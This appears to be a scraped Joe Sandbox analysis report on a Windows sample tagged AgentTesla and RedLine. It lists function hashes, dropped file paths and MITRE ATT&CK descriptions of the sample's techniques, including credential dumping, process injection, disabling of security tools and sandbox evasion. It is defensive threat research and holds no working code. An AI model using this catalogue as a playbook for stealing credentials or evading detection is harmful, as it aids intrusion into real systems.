Instruction Fuzzy Hash: E101A4B4B103145FDBA4EA6CD4A476E7BD9EBC9710F109839E10ACB3D5EE25DC424781

Function 02DD7EA8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8164f1fe0203e67b910f2a73b43e57a22723eb9e037ca19f13dc09d35cee5ae6
Instruction ID: 5fb7dd94341c0785fca649f138cf3c2e23714ea5d31aea7845170da926394551
Opcode Fuzzy Hash: 8164f1fe0203e67b910f2a73b43e57a22723eb9e037ca19f13dc09d35cee5ae6
Instruction Fuzzy Hash: 7301E535B00604CFE728EB74D569BAEBBB2EF88315F1554A9E9069B3A4DF349C41CB40

Function 06B0C8F0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5197ce5c46e56ec265e586a5f2cfec43a9748d67632fd854d45fc10d917d27c
Instruction ID: 5f993314012d8bff95898884a584f1c604986f6995a5b5b093fb7d55eae1b3c3
Opcode Fuzzy Hash: d5197ce5c46e56ec265e586a5f2cfec43a9748d67632fd854d45fc10d917d27c
Instruction Fuzzy Hash: 36F0A772E202289BDF549565DC40A9ABF3AEB84354F104565D901E7384DB71BC00CBD0

Function 02DD8F48 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7da528d20773140fe3e232e185639bc444d4f2164372c124825abb15e7aa34d0
Instruction ID: 372d39b10f7563d9df1e1f986de2855d1012734c1c5edca2e8dc89679508b3c3
Opcode Fuzzy Hash: 7da528d20773140fe3e232e185639bc444d4f2164372c124825abb15e7aa34d0
Instruction Fuzzy Hash: 6FF0C93091030EAFCB45FFA8E950BAD7BF1EB44654F105AA9C10597298EB31AF059B91

Function 06B06569 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3182672023.0000000006B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6b00000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d499d09d7708ab196c1806fe0bf1f8b1cd0a7672b398d6db53fac12fb6ed47
Instruction ID: 8ffe6c3626ab18ebd9f10681f3064c1104db94da2ad3de580348cde9e5e60864
Opcode Fuzzy Hash: 75d499d09d7708ab196c1806fe0bf1f8b1cd0a7672b398d6db53fac12fb6ed47
Instruction Fuzzy Hash: A2E0D8B4E1524C6BEFA0DA74C90978A7FBDEB02214F1048E9E404DB187F576D9128792

Function 02DD09DD Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25437d6790b08a32a9297d5a3708308de4671e50153f160532e07fb886f9775b
Instruction ID: 2ec179d1fb0fdc3acfa960bb5d602bcb594c6877893e0edd9156e624a2f5342d
Opcode Fuzzy Hash: 25437d6790b08a32a9297d5a3708308de4671e50153f160532e07fb886f9775b
Instruction Fuzzy Hash: 3ED02B21248F198EE603507478B13FC2A9847EA35FF400432D049DBB0EC1008F99D100

Function 02DDFF9C Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 211cba04b3746afb93b3a10284266bc3b66a41e80cc2d20618f680e7bbb4053d
Instruction ID: d5cd47a100b18f84e0748d2482662270264ea0d1047195cfba6970205132b3a1
Opcode Fuzzy Hash: 211cba04b3746afb93b3a10284266bc3b66a41e80cc2d20618f680e7bbb4053d
Instruction Fuzzy Hash: 90E02636700E118FDF1867B8B4503BC6346D784218F104536C603DB744E762CD05C380

Function 02DDF841 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74139b9340e26653d09eac36a3f452a8cedf9ec49fce31f2f2b72def930aee53
Instruction ID: e2c8f31267c9cf80d39590b6b578bc872f7d5971ffda553b47245fb3ecafa6b2
Opcode Fuzzy Hash: 74139b9340e26653d09eac36a3f452a8cedf9ec49fce31f2f2b72def930aee53
Instruction Fuzzy Hash: 9BE0CD345C47454FD7212B799C553553B9CD701120F300456F957CB742D714CD41C363

Function 02DDEED0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71bf04d8ec8f93f55c3cb9293cf138579225ab50e9307816978e07262c82fca
Instruction ID: 5745af5ad1da0b6fc061867a446914e17f84c93ddb55076120508c52df5f5431
Opcode Fuzzy Hash: b71bf04d8ec8f93f55c3cb9293cf138579225ab50e9307816978e07262c82fca
Instruction Fuzzy Hash: EFE02630205B04AFD330A22CD904B4377DABB49304F000459E98AC7F42C710FC0087A1

Function 02DDF850 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ff5a60c4f67eb9d9c530808b3b526b7575f2fef1af9a065290ce5c9bce510c
Instruction ID: 145865aa9a1bbe40658edc7b1766b1e19600d45ee175bc0f1cbd47445e7d95af
Opcode Fuzzy Hash: 38ff5a60c4f67eb9d9c530808b3b526b7575f2fef1af9a065290ce5c9bce510c
Instruction Fuzzy Hash: 35D0A774AC06068FDB302B6CAC48315378CD744260F300425EA0BCBB05D715DC41D703

Function 02DDF7BF Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd4fa711b3334e2776e37d2cc4b84b016b64ddc6f914d8b09f71be38c4e58e6c
Instruction ID: 392e2e70fb475af9da179d5bf4399b2640aacc774235a6f3f65a71440f30d24e
Opcode Fuzzy Hash: cd4fa711b3334e2776e37d2cc4b84b016b64ddc6f914d8b09f71be38c4e58e6c
Instruction Fuzzy Hash: 2AD0C972B012149EEF64B7B0AC215BDBBA6EB80660F6085A1DA155B180DA664D268B81

Function 02DD7F14 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3159974957.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2dd0000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bc80a086f20aa20560cc471e6836e09291659a75f60b186e5c7cd884621de0b
Instruction ID: b8f2e4854c42ff1affb1bac160895d47744cdad71aaa8cb0d5f53c4c06c93c4c
Opcode Fuzzy Hash: 0bc80a086f20aa20560cc471e6836e09291659a75f60b186e5c7cd884621de0b
Instruction Fuzzy Hash: 35C08C21A10558CAEB3442A8B4087DDFFA4C7C0326F0000AAD10480084473049A4C711

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Drive: Drive Access, File: File Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RJKUWSGxej.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Au3Check.exe

C:\Program Files (x86)\AutoIt3\Au3Info.exe

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

Windows Analysis Report
RJKUWSGxej.exe

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre